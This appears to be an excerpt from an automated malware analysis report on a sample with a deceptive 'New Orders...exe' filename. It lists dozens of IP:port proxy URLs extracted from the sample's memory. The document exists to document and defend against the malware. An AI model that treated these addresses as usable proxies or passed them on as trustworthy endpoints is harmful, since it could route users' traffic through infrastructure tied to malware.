                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.255.132.60:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.10.131:8004
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.10.131:8004://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.12.249:8004
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.12.249:8004://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.13.192:8004
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://114.99.13.192:8004://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.112.74:8090
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.112.74:8090://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.28.10:8674
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.127.28.10:8674://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.221.242.131:9999
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.221.242.131:9999://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.240.163.31
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.240.163.31://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.240.163.31:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.243.142.185:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.243.142.185:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.162
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.162://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.244.127.162:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.248.66.131:3129
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.248.66.131:3129://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.42.45.1
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.42.45.1://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.42.45.1:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.75.160.196:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.75.160.196:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.84.248.140:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.84.248.140:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.96.208.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.96.208.124:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://115.96.208.124:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.106.105.55:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.106.105.55:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.48.208:35050
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.48.208:35050://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.21:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.21:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.25:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.118.98.25:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.199.168
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.199.168.1:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.199.168.1:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.27.109
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.27.109://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.203.27.109:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.242.89.230:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.242.89.230:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.5.187.116:7890
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.5.187.116:7890://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.50.174.181:17066
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.50.174.181:17066://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.62.147.249:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.62.147.249:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.9.163.205:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.9.163.205:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.97.240.147:4995
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.97.240.147:4995://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.99.237.142:5311
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.99.237.142:5311://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.130:8899
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.130:8899://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.132:8899
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD265DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.134:8899
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD265E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.134:8899://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:82
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:82://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:9990
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.160.250.163:9990://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.202.20.69:1088
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.202.20.69:1088://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.235:8089
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.235:8089://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.27:8089
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD260DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://117.70.49.27:8089://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.117.190.148:8089
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.117.190.148:8089://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.124.103:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.124.103:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.230.19:1080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.173.230.19:1080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.222.104.135
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.222.104.135://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.222.104.135:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.66.50:32650
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.66.50:32650://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.99.233:5678
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.71.99.233:5678://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.99.108.4:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://118.99.108.4:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.146.114:5020
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.146.114:5020://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.34:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.9:5020
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.18.149.9:5020://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.196.168.183
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.196.168.183://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.196.168.183:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.2.52.152:8282
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.2.52.152:8282://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.28.60.64:8090
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.28.60.64:8090://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.29.84.133:20806
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.29.84.133:20806://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.42.71.103:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.42.71.103:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD298D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.47.90.25:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.47.90.43:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194:8123
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.189.194:8123://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27:8123
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.81.71.27:8123://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.84.215.127:3256
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.84.215.127:3256://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.91.214.119:3389
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.91.214.119:3389://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://119.91.214.119:3389x2
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.176.231.147
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.176.231.147://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2543B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.176.231.147:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.248.41.130:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.248.41.130:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.7.109.1:9812
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://12.7.109.1:9812://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.197.40.219:9002
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.197.40.219:9002://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.234.203.171:9002
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.234.203.171:9002://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.24.52.179:3128
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.24.52.179:3128://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.37.121.209:9091
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.37.121.209:9091://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.77.148.138:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.77.148.138:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.68
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.68://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.78.191.68:80
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.79.101.0:8888
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://120.79.101.0:8888://proxy
